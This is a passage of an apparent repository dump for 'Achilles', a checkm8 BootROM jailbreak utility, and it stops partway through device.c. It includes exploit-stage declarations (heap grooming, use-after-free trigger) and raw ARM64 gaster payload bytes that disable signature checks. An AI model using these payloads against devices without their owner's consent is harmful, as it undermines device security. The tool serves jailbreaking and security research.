├── .gitignore ├── include ├── exploit │ ├── recovery.h │ ├── device.h │ ├── exploit.h │ ├── checkm8.h │ ├── dfu.h │ ├── gaster │ │ ├── payload_notA9.h │ │ ├── payload_handle_checkm8_request.h │ │ └── payload_A9.h │ ├── payload.h │ └── checkra1n │ │ ├── yolo_s8000.h │ │ ├── yolo_s8003.h │ │ ├── yolo_t7000.h │ │ ├── yolo_t7001.h │ │ └── yolo_s8001.h ├── pongo │ ├── pongoterm.h │ ├── boot.h │ ├── pongo_helper.h │ ├── shellcode.h │ └── lz4 │ │ └── lz4hc.h ├── utils │ ├── log.h │ └── ANSI-color-codes.h ├── Achilles.h └── usb │ └── usb.h ├── .vscode └── settings.json ├── src ├── exploit │ ├── recovery.c │ ├── device.c │ ├── dfu.c │ ├── exploit.c │ ├── payload.c │ └── checkm8.c ├── utils │ └── log.c ├── pongo │ ├── boot.c │ ├── pongoterm.c │ └── pongo_helper.c ├── main.c └── usb │ └── usb.c ├── Makefile ├── LICENSE.md └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | build/ 3 | nocommit-* 4 | .test/ -------------------------------------------------------------------------------- /include/exploit/recovery.h: -------------------------------------------------------------------------------- 1 | #ifndef RECOVERY_H 2 | #define RECOVERY_H 3 | 4 | #include 5 | 6 | bool send_command_to_recovery_mode(usb_handle_t *handle, char *command); 7 | 8 | #endif // RECOVERY_H -------------------------------------------------------------------------------- /include/pongo/pongoterm.h: -------------------------------------------------------------------------------- 1 | #ifndef PONGOTERM_H 2 | #define PONGOTERM_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | void pongoterm(void); 9 | 10 | #endif // PONGOTERM_H -------------------------------------------------------------------------------- /include/pongo/boot.h: -------------------------------------------------------------------------------- 1 | #ifndef BOOT_H 2 | #define BOOT_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | bool wait_for_device_to_enter_yolo_dfu(usb_handle_t *handle); 10 | bool send_pongo_to_yolo_dfu(usb_handle_t *handle); 11 | 12 | #endif // BOOT_H -------------------------------------------------------------------------------- /include/exploit/device.h: -------------------------------------------------------------------------------- 1 | #ifndef DEVICE_H 2 | #define DEVICE_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | bool find_device_in_normal_mode(idevice_t *device); 12 | bool place_device_into_recovery_mode(idevice_t device); 13 | 14 | #endif // DEVICE_H -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "clangd.fallbackFlags": [ 3 | "-I${workspaceFolder}/include", 4 | ], 5 | "files.associations": { 6 | "*.ejs": "html", 7 | "yolo_s8000.h": "c", 8 | "__hash_table": "c", 9 | "__split_buffer": "c", 10 | "array": "c", 11 | "bitset": "c", 12 | "initializer_list": "c", 13 | "span": "c", 14 | "string": "c", 15 | "string_view": "c", 16 | "unordered_map": "c", 17 | "vector": "c" 18 | } 19 | } -------------------------------------------------------------------------------- /src/exploit/recovery.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | bool send_command_to_recovery_mode(usb_handle_t *handle, char *command) { 4 | int commandLength = strlen(command); 5 | if (commandLength >= 0x100) { 6 | LOG(LOG_ERROR, "Command is too long"); 7 | return false; 8 | } 9 | if (commandLength < 1) { 10 | LOG(LOG_ERROR, "Command is too short"); 11 | return false; 12 | } 13 | transfer_ret_t ret; 14 | send_usb_control_request(handle, 0x40, 0, 0, 0, (unsigned char*)command, commandLength + 1, &ret); 15 | return true; 16 | } -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all 2 | CC=gcc 3 | SOURCES=$(wildcard src/*.c) $(wildcard src/usb/*.c) $(wildcard src/utils/*.c) $(wildcard src/exploit/*.c) $(wildcard src/pongo/*.c) $(wildcard src/pongo/lz4/*.c) 4 | OUTPUT=build/Achilles 5 | LIBS=-limobiledevice-1.0 -lusb-1.0 -lcrypto 6 | CFLAGS=-Iinclude -Wall 7 | 8 | all: Achilles 9 | 10 | Achilles: $(SOURCES) 11 | @mkdir -p build 12 | $(CC) $(SOURCES) $(LIBS) $(CFLAGS) -o $(OUTPUT) 13 | 14 | install: Achilles 15 | @mkdir -p /usr/local/bin 16 | @sudo cp $(OUTPUT) /usr/local/bin/Achilles 17 | 18 | clean: 19 | @rm -rf build -------------------------------------------------------------------------------- /include/utils/log.h: -------------------------------------------------------------------------------- 1 | #ifndef LOG_H 2 | #define LOG_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | 12 | typedef enum 13 | { 14 | LOG_ERROR = 1, 15 | LOG_INFO = 2, 16 | LOG_SUCCESS = 3, 17 | LOG_VERBOSE = 4 18 | } log_level_t; 19 | 20 | void step(int time, int time2, char *text); 21 | 22 | int AchillesLog(log_level_t loglevel, bool newline, const char *fname, int lineno, const char *fxname, const char *__restrict format, ...); 23 | 24 | #endif // LOG_H -------------------------------------------------------------------------------- /include/exploit/exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef EXPLOIT_H 2 | #define EXPLOIT_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | 10 | enum ExploitStage { 11 | STAGE_PREPARE = 0, 12 | STAGE_RESET = 1, 13 | STAGE_HEAP_SPRAY = 2, 14 | STAGE_TRIGGER = 3, 15 | STAGE_PATCH = 4, 16 | STAGE_PONGO = 5, 17 | STAGE_JAILBREAK = 6, 18 | STAGE_DONE = 7 19 | }; 20 | 21 | enum ExploitMode { 22 | MODE_CHECKM8 = 0, 23 | MODE_PONGOOS = 1 24 | }; 25 | 26 | bool checkm8(enum ExploitMode mode); 27 | 28 | #endif // EXPLOIT_H -------------------------------------------------------------------------------- /include/pongo/pongo_helper.h: -------------------------------------------------------------------------------- 1 | #ifndef PONGO_HELPER_H 2 | #define PONGO_HELPER_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define USB_RET_SUCCESS KERN_SUCCESS 10 | #define USB_RET_NOT_RESPONDING kIOReturnNotResponding 11 | #define USB_RET_IO kIOReturnNotReady 12 | #define USB_RET_NO_DEVICE kIOReturnNoDevice 13 | 14 | #define CMD_LENGTH_MAX 512 15 | 16 | bool prepare_pongo(unsigned char **pongoBuf, size_t *size); 17 | int issue_pongo_command(usb_handle_t *handle, char *command, char *outBuffer); 18 | bool upload_file_to_pongo(usb_handle_t *handle, const char *path); 19 | bool pongo_jailbreak(usb_handle_t *handle); 20 | 21 | #endif // PONGO_HELPER_H -------------------------------------------------------------------------------- /include/exploit/checkm8.h: -------------------------------------------------------------------------------- 1 | #ifndef CHECKM8_H 2 | #define CHECKM8_H 3 | 4 | #include 5 | #include 6 | 7 | #ifndef MIN 8 | # define MIN(a, b) ((a) < (b) ? (a) : (b)) 9 | #endif 10 | 11 | bool checkm8_reset(usb_handle_t *handle); 12 | bool checkm8_heap_feng_shui(usb_handle_t *handle, struct DeviceConfiguration *config); 13 | bool checkm8_trigger_UaF(usb_handle_t *handle, struct DeviceConfiguration *config); 14 | bool checkm8_send_overwrite_and_payload(usb_handle_t *handle, struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, bool bootingPongoOS); 15 | 16 | bool checkm8_find_device_configuration_for_cpid(int cpid, struct DeviceConfiguration *config); 17 | bool checkm8_find_payload_configuration_for_cpid(int cpid, struct PayloadConfiguration *config); 18 | 19 | #endif // CHECKM8_H -------------------------------------------------------------------------------- /include/Achilles.h: -------------------------------------------------------------------------------- 1 | #ifndef ACHILLES_H 2 | #define ACHILLES_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include 11 | 12 | #define LOG(logLevel, ...) AchillesLog(logLevel, true, __FILE__, __LINE__, __func__, __VA_ARGS__) 13 | #define LOG_NO_NEWLINE(logLevel, ...) AchillesLog(logLevel, false, __FILE__, __LINE__, __func__, __VA_ARGS__) 14 | 15 | struct AchillesArgs { 16 | char *deviceUDID; 17 | bool debug; 18 | bool verbose; 19 | bool quiet; 20 | bool disableSignatureChecks; 21 | bool bootToPongo; 22 | bool jailbreak; 23 | bool verboseBoot; 24 | bool serialOutput; 25 | bool pongoterm; 26 | char *bootArgs; 27 | char *pongoPath; 28 | char *kpfPath; 29 | char *ramdiskPath; 30 | char *overlayPath; 31 | }; 32 | 33 | #endif // ACHILLES_H -------------------------------------------------------------------------------- /include/exploit/dfu.h: -------------------------------------------------------------------------------- 1 | #ifndef DFU_H 2 | #define DFU_H 3 | 4 | #include 5 | #include 6 | 7 | #define DFU_DNLOAD 1 8 | #define DFU_UPLOAD 2 9 | #define DFU_GETSTATUS 3 10 | #define DFU_CLRSTATUS 4 11 | #define DFU_GETSTATE 5 12 | #define DFU_ABORT 6 13 | 14 | #define DFU_FILE_SUFFIX_LENGTH 16 15 | #define EP0_MAX_PACKET_SIZE 0x40 16 | #define DFU_MAX_TRANSFER_SIZE 0x800 17 | #define DFU_STATUS_OK 0 18 | #define DFU_STATE_MANIFEST_SYNC 6 19 | #define DFU_STATE_MANIFEST 7 20 | #define DFU_STATE_MANIFEST_WAIT_RESET 8 21 | 22 | bool dfu_device_set_await_reset(const usb_handle_t *handle); 23 | 24 | int dfu_serial_number_get_cpid(char *serial); 25 | bool dfu_serial_number_is_in_dfu_mode(char *serial); 26 | bool dfu_serial_number_is_pwned(char *serial); 27 | bool dfu_serial_number_is_in_yolo_dfu(char *serial); 28 | bool device_serial_number_is_in_pongo_os(char *serial); 29 | 30 | bool get_device_into_dfu_mode(usb_handle_t *handle); 31 | 32 | #endif // DFU_H -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 alfiecg24 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /include/exploit/gaster/payload_notA9.h: -------------------------------------------------------------------------------- 1 | unsigned char payload_notA9[] = { 2 | 0xfd, 0x7b, 0xbf, 0xa9, 0x20, 0x04, 0x00, 0x58, 0x42, 0x04, 0x00, 0x58, 3 | 0x5f, 0x00, 0x00, 0xf9, 0x42, 0x04, 0x00, 0x58, 0x01, 0x30, 0x00, 0x91, 4 | 0x41, 0x00, 0x00, 0xf9, 0x21, 0xff, 0xff, 0x10, 0x02, 0x04, 0x00, 0x58, 5 | 0x21, 0x00, 0x02, 0x8b, 0x02, 0x04, 0x00, 0x58, 0x23, 0x04, 0x00, 0x58, 6 | 0x60, 0x00, 0x3f, 0xd6, 0x20, 0x04, 0x00, 0x58, 0x00, 0x04, 0x00, 0x91, 7 | 0x01, 0x00, 0x40, 0x39, 0xc1, 0xff, 0xff, 0x35, 0xa1, 0x01, 0x00, 0x10, 8 | 0x22, 0x0c, 0x40, 0xa9, 0x02, 0x0c, 0x00, 0xa9, 0x40, 0x03, 0x00, 0x58, 9 | 0x61, 0x03, 0x00, 0x58, 0x20, 0x00, 0x3f, 0xd6, 0x61, 0x03, 0x00, 0x58, 10 | 0x20, 0x00, 0x00, 0x39, 0x00, 0x50, 0xba, 0x52, 0x41, 0x03, 0x00, 0x58, 11 | 0x20, 0x00, 0x00, 0xb9, 0xfd, 0x7b, 0xc1, 0xa8, 0xc0, 0x03, 0x5f, 0xd6, 12 | 0x20, 0x50, 0x57, 0x4e, 0x44, 0x3a, 0x5b, 0x63, 0x68, 0x65, 0x63, 0x6b, 13 | 0x6d, 0x38, 0x5d, 0x00, 0xf0, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 14 | 0xf1, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf2, 0xff, 0xff, 0x7f, 15 | 0x00, 0x00, 0x00, 0x00, 0xf3, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 16 | 0xf4, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf5, 0xff, 0xff, 0x7f, 17 | 0x00, 0x00, 0x00, 0x00, 0xf6, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 18 | 0xf7, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf8, 0xff, 0xff, 0x7f, 19 | 0x00, 0x00, 0x00, 0x00, 0xf9, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00 20 | }; 21 | unsigned int payload_notA9_len = 216; 22 | -------------------------------------------------------------------------------- /include/exploit/gaster/payload_handle_checkm8_request.h: -------------------------------------------------------------------------------- 1 | unsigned char payload_handle_checkm8_request[] = { 2 | 0x07, 0x06, 0x00, 0x58, 0xe0, 0x00, 0x1f, 0xd6, 0xfe, 0xff, 0xff, 0x17, 3 | 0x02, 0x00, 0x40, 0x79, 0x5f, 0x84, 0x0a, 0x71, 0x61, 0xff, 0xff, 0x54, 4 | 0xfd, 0x7b, 0xbf, 0xa9, 0xf3, 0x53, 0xbf, 0xa9, 0xf3, 0x03, 0x00, 0xaa, 5 | 0x34, 0x05, 0x00, 0x58, 0xe1, 0xff, 0x9f, 0x52, 0x62, 0x06, 0x40, 0x79, 6 | 0x3f, 0x00, 0x02, 0x6b, 0x21, 0x03, 0x00, 0x54, 0x80, 0x02, 0x40, 0xf9, 7 | 0xa1, 0x04, 0x00, 0x58, 0x1f, 0x00, 0x01, 0xeb, 0x61, 0x01, 0x00, 0x54, 8 | 0x9f, 0x02, 0x00, 0xf9, 0x80, 0x06, 0x41, 0xa9, 0x82, 0x0e, 0x42, 0xa9, 9 | 0x84, 0x16, 0x43, 0xa9, 0x86, 0x1e, 0x44, 0xa9, 0x88, 0x06, 0x40, 0xf9, 10 | 0x00, 0x01, 0x3f, 0xd6, 0xa8, 0x03, 0x00, 0x58, 0x88, 0x02, 0x00, 0xa9, 11 | 0x0b, 0x00, 0x00, 0x14, 0x81, 0x03, 0x00, 0x58, 0x1f, 0x00, 0x01, 0xeb, 12 | 0x01, 0x01, 0x00, 0x54, 0x9f, 0x02, 0x00, 0xf9, 0x80, 0x06, 0x41, 0xa9, 13 | 0x82, 0x12, 0x40, 0xf9, 0x03, 0x03, 0x00, 0x58, 0x60, 0x00, 0x3f, 0xd6, 14 | 0x48, 0x02, 0x00, 0x58, 0x88, 0x02, 0x00, 0xa9, 0x00, 0x10, 0x80, 0x52, 15 | 0xe1, 0x03, 0x14, 0xaa, 0x62, 0x0e, 0x40, 0x79, 0xe3, 0x03, 0x1f, 0xaa, 16 | 0x44, 0x02, 0x00, 0x58, 0x80, 0x00, 0x3f, 0xd6, 0x00, 0x00, 0x80, 0x52, 17 | 0xf3, 0x53, 0xc1, 0xa8, 0xfd, 0x7b, 0xc1, 0xa8, 0xc0, 0x03, 0x5f, 0xd6, 18 | 0xf0, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf1, 0xff, 0xff, 0x7f, 19 | 0x00, 0x00, 0x00, 0x00, 0xf2, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 20 | 0xf3, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf4, 0xff, 0xff, 0x7f, 21 | 0x00, 0x00, 0x00, 0x00, 0xf5, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 22 | 0xf6, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00 23 | }; 24 | unsigned int payload_handle_checkm8_request_len = 248; 25 | -------------------------------------------------------------------------------- /include/exploit/gaster/payload_A9.h: -------------------------------------------------------------------------------- 1 | unsigned char payload_A9[] = { 2 | 0xfd, 0x7b, 0xbf, 0xa9, 0xe0, 0x05, 0x00, 0x58, 0x02, 0x06, 0x00, 0x58, 3 | 0x5f, 0x00, 0x00, 0xf9, 0x02, 0x06, 0x00, 0x58, 0x01, 0x30, 0x00, 0x91, 4 | 0x41, 0x00, 0x00, 0xf9, 0x21, 0xff, 0xff, 0x10, 0xc2, 0x05, 0x00, 0x58, 5 | 0x21, 0x00, 0x02, 0x8b, 0xc2, 0x05, 0x00, 0x58, 0xe3, 0x05, 0x00, 0x58, 6 | 0x60, 0x00, 0x3f, 0xd6, 0xe0, 0x05, 0x00, 0x58, 0x00, 0x04, 0x00, 0x91, 7 | 0x01, 0x00, 0x40, 0x39, 0xc1, 0xff, 0xff, 0x35, 0x61, 0x03, 0x00, 0x10, 8 | 0x22, 0x0c, 0x40, 0xa9, 0x02, 0x0c, 0x00, 0xa9, 0x00, 0x05, 0x00, 0x58, 9 | 0x21, 0x05, 0x00, 0x58, 0x20, 0x00, 0x3f, 0xd6, 0x21, 0x05, 0x00, 0x58, 10 | 0x20, 0x00, 0x00, 0x39, 0x20, 0x05, 0x00, 0x58, 0x01, 0x00, 0x40, 0xf9, 11 | 0x21, 0xf4, 0x78, 0x92, 0x01, 0x00, 0x00, 0xf9, 0x9f, 0x3f, 0x03, 0xd5, 12 | 0x1f, 0x87, 0x0e, 0xd5, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 13 | 0x02, 0x50, 0xba, 0x52, 0x43, 0x04, 0x00, 0x58, 0x62, 0x00, 0x00, 0xb9, 14 | 0x21, 0x00, 0x79, 0xb2, 0x01, 0x00, 0x00, 0xf9, 0x9f, 0x3f, 0x03, 0xd5, 15 | 0x1f, 0x87, 0x0e, 0xd5, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 16 | 0xfd, 0x7b, 0xc1, 0xa8, 0xc0, 0x03, 0x5f, 0xd6, 0x20, 0x50, 0x57, 0x4e, 17 | 0x44, 0x3a, 0x5b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x6d, 0x38, 0x5d, 0x00, 18 | 0xf0, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf1, 0xff, 0xff, 0x7f, 19 | 0x00, 0x00, 0x00, 0x00, 0xf2, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 20 | 0xf3, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf4, 0xff, 0xff, 0x7f, 21 | 0x00, 0x00, 0x00, 0x00, 0xf5, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 22 | 0xf6, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xf7, 0xff, 0xff, 0x7f, 23 | 0x00, 0x00, 0x00, 0x00, 0xf8, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 24 | 0xf9, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xfa, 0xff, 0xff, 0x7f, 25 | 0x00, 0x00, 0x00, 0x00 26 | }; 27 | unsigned int payload_A9_len = 280; 28 | -------------------------------------------------------------------------------- /include/exploit/payload.h: -------------------------------------------------------------------------------- 1 | #ifndef PAYLOAD_H 2 | #define PAYLOAD_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | struct DeviceConfiguration { 9 | uint64_t cpid, largeLeak, overwritePadding, hole; 10 | }; 11 | 12 | struct PayloadConfiguration { 13 | uint64_t tlbi, nopGadget, retGadget, patchAddress, ttbr0Address, functionGadget, ttbr0Write, 14 | memcpyAddress, aesCryptoCommand, bootTrampolineEnd, ttbr0VROMOffset, ttbr0SRAMOffset, 15 | gUSBSerialNumber, dfu_handle_request_address, usb_core_do_transfer, dfu_handle_bus_reset_address, 16 | insecureMemoryBase, handle_interface_request, usb_create_string_descriptor, usb_serial_number_string_descriptor; 17 | }; 18 | 19 | typedef struct { 20 | uint32_t endpoint, pad_0; 21 | uint64_t io_buffer; 22 | uint32_t status, io_len, ret_cnt, pad_1; 23 | uint64_t callback, next; 24 | } dfu_callback_t; 25 | 26 | typedef struct { 27 | dfu_callback_t callback; 28 | uint64_t heap_pad_0, heap_pad_1; 29 | } checkm8_overwrite_t; 30 | 31 | typedef struct { 32 | uint64_t func, arg; 33 | } callback_t; 34 | 35 | #define MAX_BLOCK_SIZE 0x50 36 | #define ARM_16K_TT_L2_SIZE 0x2000000U 37 | 38 | #define DONE_MAGIC (0x646F6E65646F6E65ULL) // donedone 39 | #define EXEC_MAGIC (0x6578656365786563ULL) // execexec 40 | #define MEMC_MAGIC (0x6D656D636D656D63ULL) // memcmemc 41 | 42 | uint8_t *create_gaster_overwrite_for_device(struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, size_t *overwriteSize); 43 | uint8_t *create_gaster_payload_for_device(struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, size_t *payloadSize); 44 | 45 | uint8_t *create_pongo_overwrite_for_device(struct PayloadConfiguration *payloadConfig, size_t *overwriteSize); 46 | uint8_t *create_pongo_payload_for_device(struct DeviceConfiguration *deviceConfig, size_t *payloadSize); 47 | 48 | #endif // PAYLOAD_H -------------------------------------------------------------------------------- /include/usb/usb.h: -------------------------------------------------------------------------------- 1 | #ifndef USB_H 2 | #define USB_H 3 | 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | #define USB_TIMEOUT 10 11 | 12 | typedef struct { 13 | uint16_t vid, pid; 14 | struct libusb_device_handle *device; 15 | int usb_interface; 16 | struct libusb_context *context; 17 | } usb_handle_t; 18 | 19 | enum usb_transfer_ret { 20 | USB_TRANSFER_OK, 21 | USB_TRANSFER_ERROR, 22 | USB_TRANSFER_STALL 23 | }; 24 | 25 | typedef struct { 26 | enum usb_transfer_ret ret; 27 | uint32_t sz; 28 | } transfer_ret_t; 29 | 30 | void sleep_ms(unsigned ms); 31 | 32 | bool send_usb_control_request(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, transfer_ret_t *transferRet); 33 | bool send_usb_control_request_no_timeout(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, transfer_ret_t *transferRet); 34 | bool send_usb_control_request_no_data(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, size_t wLength, transfer_ret_t *transferRet); 35 | bool send_usb_control_request_async(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, unsigned usbAbortTimeout, transfer_ret_t *transferRet); 36 | bool send_usb_control_request_async_no_data(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, size_t wLength, unsigned usbAbortTimeout, transfer_ret_t *transferRet); 37 | bool send_usb_bulk_upload(usb_handle_t *handle, void *buffer, size_t length); 38 | 39 | void init_usb_handle(usb_handle_t *handle, uint16_t vid, uint16_t pid); 40 | bool wait_usb_handle(usb_handle_t *handle); 41 | bool wait_usb_handle_with_timeout(usb_handle_t *handle, unsigned timeout); 42 | void reset_usb_handle(usb_handle_t *handle); 43 | void close_usb_handle(usb_handle_t *handle); 44 | 45 | char *get_usb_device_serial_number(usb_handle_t *handle); 46 | 47 | #endif // USB_H -------------------------------------------------------------------------------- /include/utils/ANSI-color-codes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This is free and unencumbered software released into the public domain. 3 | * 4 | * For more information, please refer to 5 | */ 6 | 7 | #ifndef ANSI_COLOR_CODES_H 8 | #define ANSI_COLOR_CODES_H 9 | 10 | // Regular text 11 | #define BLK "\033[0;30m" 12 | #define RED "\033[0;31m" 13 | #define GRN "\033[0;32m" 14 | #define YEL "\033[0;33m" 15 | #define BLU "\033[0;34m" 16 | #define MAG "\033[0;35m" 17 | #define CYN "\033[0;36m" 18 | #define WHT "\033[0;37m" 19 | 20 | // Regular bold text 21 | #define BBLK "\033[1;30m" 22 | #define BRED "\033[1;31m" 23 | #define BGRN "\033[1;32m" 24 | #define BYEL "\033[1;33m" 25 | #define BBLU "\033[1;34m" 26 | #define BMAG "\033[1;35m" 27 | #define BCYN "\033[1;36m" 28 | #define BWHT "\033[1;37m" 29 | 30 | // Regular underline text 31 | #define UBLK "\033[4;30m" 32 | #define URED "\033[4;31m" 33 | #define UGRN "\033[4;32m" 34 | #define UYEL "\033[4;33m" 35 | #define UBLU "\033[4;34m" 36 | #define UMAG "\033[4;35m" 37 | #define UCYN "\033[4;36m" 38 | #define UWHT "\033[4;37m" 39 | 40 | // Regular background 41 | #define BLKB "\033[40m" 42 | #define REDB "\033[41m" 43 | #define GRNB "\033[42m" 44 | #define YELB "\033[43m" 45 | #define BLUB "\033[44m" 46 | #define MAGB "\033[45m" 47 | #define CYNB "\033[46m" 48 | #define WHTB "\033[47m" 49 | 50 | // High intensty background 51 | #define BLKHB "\033[0;100m" 52 | #define REDHB "\033[0;101m" 53 | #define GRNHB "\033[0;102m" 54 | #define YELHB "\033[0;103m" 55 | #define BLUHB "\033[0;104m" 56 | #define MAGHB "\033[0;105m" 57 | #define CYNHB "\033[0;106m" 58 | #define WHTHB "\033[0;107m" 59 | 60 | // High intensty text 61 | #define HBLK "\033[0;90m" 62 | #define HRED "\033[0;91m" 63 | #define HGRN "\033[0;92m" 64 | #define HYEL "\033[0;93m" 65 | #define HBLU "\033[0;94m" 66 | #define HMAG "\033[0;95m" 67 | #define HCYN "\033[0;96m" 68 | #define HWHT "\033[0;97m" 69 | 70 | // Bold high intensity text 71 | #define BHBLK "\033[1;90m" 72 | #define BHRED "\033[1;91m" 73 | #define BHGRN "\033[1;92m" 74 | #define BHYEL "\033[1;93m" 75 | #define BHBLU "\033[1;94m" 76 | #define BHMAG "\033[1;95m" 77 | #define BHCYN "\033[1;96m" 78 | #define BHWHT "\033[1;97m" 79 | 80 | // Reset 81 | #define reset "\033[0m" 82 | #define CRESET "\033[0m" 83 | #define COLOR_RESET "\033[0m" 84 | 85 | #endif // ANSI_COLOR_CODES_H -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Achilles 2 | 3 | Achilles is a checkm8 utility for macOS and Linux that offers a selection of tools for vulnerable devices. 4 | 5 | If you want to read more about the checkm8 exploit, check out my [blog post](https://alfiecg.uk/2023/07/21/A-comprehensive-write-up-of-the-checkm8-BootROM-exploit.html). 6 | 7 | Linux support is currently experimental - failing to send the overwrite (and thus exploit failure) is a common issue that is yet to be resolved. 8 | 9 | # Features 10 | * Patch signature checks with gaster payloads 11 | * Boot PongoOS on supported devices 12 | * Jailbreak with supplied kernel patchfinder, ramdisk and overlay 13 | 14 | # Tested devices 15 | * iPhone 7, A10 16 | * iPhone X, A11 17 | * iPad Pro 10.5", A10X 18 | 19 | # Usage 20 | ``` 21 | ➜ ~ Achilles -h 22 | Options: 23 | -d - enable debug logging 24 | -v - enable verbose logging 25 | -q - enable quiet logging (removes all logging except for errors) 26 | -s - remove signature checks 27 | -p - boot to PongoOS and exit 28 | -j - jailbreak the device (requires -K) 29 | -V - enable verbose boot 30 | -S - enable serial output 31 | 32 | -u - specify a device UDID 33 | -b - additional boot arguments 34 | -k - override PongoOS image 35 | -K - override kernel patchfinder 36 | -R - ramdisk to boot 37 | -O - overlay to boot 38 | 39 | -h - print this help message 40 | Examples: 41 | Achilles -p 42 | Achilles -j -K kpf -R ramdisk.dmg -O overlay.dmg 43 | Achilles -s 44 | ``` 45 | 46 | # Building 47 | Achilles requires the following dependencies: 48 | * libimobiledevice 49 | * libusb 50 | 51 | To build, run `make` in the root directory. This will output the final product to `build/Achilles`. 52 | 53 | To install to `/usr/local/bin`, run `make install` (you will be prompted for your password). 54 | 55 | # Credits 56 | * [checkra1n](https://checkra.in) - YoloDFU payloads and PongoOS ([license](https://github.com/checkra1n/PongoOS/tree/master/LICENSE.md)) 57 | * [0x7ff](https://github.com/0x7FF) - gaster ([license](https://github.com/0x7ff/gaster/tree/main/LICENSE)) 58 | * [Mineek](https://github.com/Mineek) - openra1n (unlicensed) 59 | * [axi0mX](https://github.com/axi0mX) - checkm8 exploit ([license](https://github.com/axi0mX/ipwndfu/tree/master/LICENSE)) 60 | * [palera1n](https://palera.in) - DFU helper, libimobiledevice code ([license](https://github.com/palera1n/palera1n/tree/main/LICENSE)) 61 | -------------------------------------------------------------------------------- /src/exploit/device.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | extern bool stopThreads; 4 | extern struct AchillesArgs args; 5 | 6 | bool find_device_in_normal_mode(idevice_t *device) { 7 | idevice_t newDevice = NULL; 8 | 9 | while (!stopThreads) { 10 | char *udid = args.deviceUDID; 11 | 12 | if (!udid) { 13 | char **deviceIDs; 14 | int count; 15 | 16 | idevice_error_t listRet = idevice_get_device_list(&deviceIDs, &count); 17 | 18 | if (listRet != IDEVICE_E_SUCCESS) 19 | { 20 | return false; 21 | } 22 | if (count == 0) 23 | { 24 | goto no_devices; 25 | } 26 | if (count > 1) 27 